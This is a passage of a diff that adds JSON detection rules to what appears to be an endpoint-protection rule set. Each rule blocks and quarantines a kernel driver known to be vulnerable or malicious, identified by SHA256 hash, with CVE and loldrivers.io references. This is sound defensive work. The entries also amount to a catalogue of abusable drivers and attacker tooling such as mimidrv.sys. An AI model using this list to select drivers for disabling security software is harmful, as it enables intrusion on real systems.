+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461752Z",
+ "creation_date": "2026-03-23T11:45:30.461756Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461764Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8bdcf7457c2caf7fa0386571f972d7f5220d385ad686e2c3536f4c67ba4333e6",
+ "comment": "Vulnerable Kernel Driver (aka mhyprotect.sys) [https://www.loldrivers.io/drivers/7abc873d-9c28-44c2-8f60-701a8e26af29/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6c33ceb3-337f-57e1-82ae-71ef8e6e9ecc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608474Z",
+ "creation_date": "2026-03-23T11:45:29.608476Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608481Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3724b39e97936bb20ada51c6119aded04530ed86f6b8d6b45fbfb2f3b9a4114b",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6c35a0c6-43f3-5b4d-b34d-c7cc820afcc6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825836Z",
+ "creation_date": "2026-03-23T11:45:31.825838Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825844Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "540c2a28f82a9f3b09b79c6d0adbccff9655645fcc93133840ac4abcb19ef643",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6c36919e-06a7-5eb1-99aa-81dfba1a696d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974540Z",
+ "creation_date": "2026-03-23T11:45:29.974542Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974547Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "14cfe7b4f7572aa3434ac5dd458a35f286538b34734cf7a310fb7bcba209921c",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6c3db75b-5858-5815-ab91-6b1536bd4212",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145242Z",
+ "creation_date": "2026-03-23T11:45:32.145244Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145249Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e060b051d0b8eca8490347f679e63391c792b6b37684e11301f4ed187173c3fd",
+ "comment": "Vulnerable Kernel Driver (aka RtsPer.sys) [https://www.loldrivers.io/drivers/32155681-33e8-4d0d-b9f6-c822851e7321/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6c538976-3446-58d6-9aad-45374163ef6d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607748Z",
+ "creation_date": "2026-03-23T11:45:29.607750Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607755Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9f1025601d17945c3a47026814bdec353ee363966e62dba7fe2673da5ce50def",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6c5a0c32-08da-54bf-a778-a2f3b476e2ea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819567Z",
+ "creation_date": "2026-03-23T11:45:30.819569Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819575Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "16ae28284c09839900b99c0bdf6ce4ffcd7fe666cfd5cfb0d54a3ad9bea9aa9c",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6c63e9e1-8c23-5cee-8edb-04143c794a1a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143521Z",
+ "creation_date": "2026-03-23T11:45:32.143524Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143529Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3af9c376d43321e813057ecd0403e71cafc3302139e2409ab41e254386c33ecb",
+ "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6c746b78-8969-5498-af20-41eb156a995d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825364Z",
+ "creation_date": "2026-03-23T11:45:31.825367Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825376Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "06480527d19a9f4976aeb5c1a6bd362618d472d2bc84032e50ff4f23187ff5dd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6c76c165-dd18-5f38-b09e-10c4aaddebff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467210Z",
+ "creation_date": "2026-03-23T11:45:30.467213Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467222Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0cde416accd63c33ac9f4fd7bb6426c8bc3e6a18a335e9bbfea7cc767c30d3b6",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6c81e492-3627-5c81-85b5-d9ef245db970",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146226Z",
+ "creation_date": "2026-03-23T11:45:32.146229Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146234Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b4f33ffef069c18e8a8834eb448dd1f1dbdaae93b140cfff5a1db015eb3ada2f",
+ "comment": "Malicious Kernel Driver (aka driver_b4f33ffe.sys) [https://www.loldrivers.io/drivers/51a44484-8bcc-4150-8b94-4a755cff0af8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6c8880c7-69de-5f01-9a22-73e3bdb020d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467819Z",
+ "creation_date": "2026-03-23T11:45:30.467823Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467832Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f43d0680cecea2db04d2f2eff7ff37a13beec280e62b76b9dbdc38d0e225fca",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6c8cab98-f1c2-5b65-aae6-b7318f2aa8d8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617289Z",
+ "creation_date": "2026-03-23T11:45:29.617291Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617296Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ad40e6d0f77c0e579fb87c5106bf6de3d1a9f30ee2fbf8c9c011f377fa05f173",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6c8dd904-0551-5481-bad6-efb1f4b12ec6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817042Z",
+ "creation_date": "2026-03-23T11:45:31.817044Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817050Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "268e8ab3593266b68e6ffde8b97ad4fe04eff0b10d737d4e9bccd6623d43f374",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6c92435a-63c7-529c-864f-dbf529ecbbc4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969488Z",
+ "creation_date": "2026-03-23T11:45:29.969490Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969495Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5af59d6ca109b5cae3350b48b85274ce181e45be4c7f7156bdf58ca3ca7f4188",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6c92e144-b19e-5239-bd5d-95889bed4a68",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825494Z",
+ "creation_date": "2026-03-23T11:45:31.825496Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825501Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f46c650e76a8e764cd4b4867c8baf9bbdbaae3be5c7b5d193ab3813fb59e0a57",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6c9cfd80-5407-5d71-aaa1-8ff7b6e29b9f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614215Z",
+ "creation_date": "2026-03-23T11:45:29.614217Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614222Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "555ebe7901706dbf801b5dbda6660002d3b36e5c669ec98ccfc6884a7481c56e",
+ "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6ca053e4-4c46-53d0-8f9a-ca1130043e55",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606935Z",
+ "creation_date": "2026-03-23T11:45:29.606937Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606950Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b4f9272894f926d4f3b957fca673140a3a24dc896f1a49badaa1e04687b223cd",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6ca0ee17-6652-5a70-87b5-17024ccd354c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979602Z",
+ "creation_date": "2026-03-23T11:45:29.979604Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979609Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e7e7824d611527b67fc36128da1b35d9b8ce3ffdab3fb96e3dbabd6e9c9570c0",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6ca924f3-1fa3-5ba0-a28d-e53b85d9ab62",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463839Z",
+ "creation_date": "2026-03-23T11:45:30.463842Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463851Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bcca03ce1dd040e67eb71a7be0b75576316f0b6587b2058786fda8b6f0a5adfd",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6ca99354-fa3d-5e23-bce0-af4be1bd3496",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473242Z",
+ "creation_date": "2026-03-23T11:45:30.473245Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473254Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "da617fe914a5f86dc9d657ef891bbbceb393c8a6fea2313c84923f3630255cdb",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6ca9b741-f1d4-5f9a-9bf7-4bb13f059716",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473236Z",
+ "creation_date": "2026-03-23T11:45:31.473239Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473248Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9137c32623cd450511f60c6bb44e14ced32dc66de2bd5880ce9be18c40bee263",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6cb03078-0f43-50cb-af8e-35dee76744dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487908Z",
+ "creation_date": "2026-03-23T11:45:31.487910Z",
+ "enabled": true,
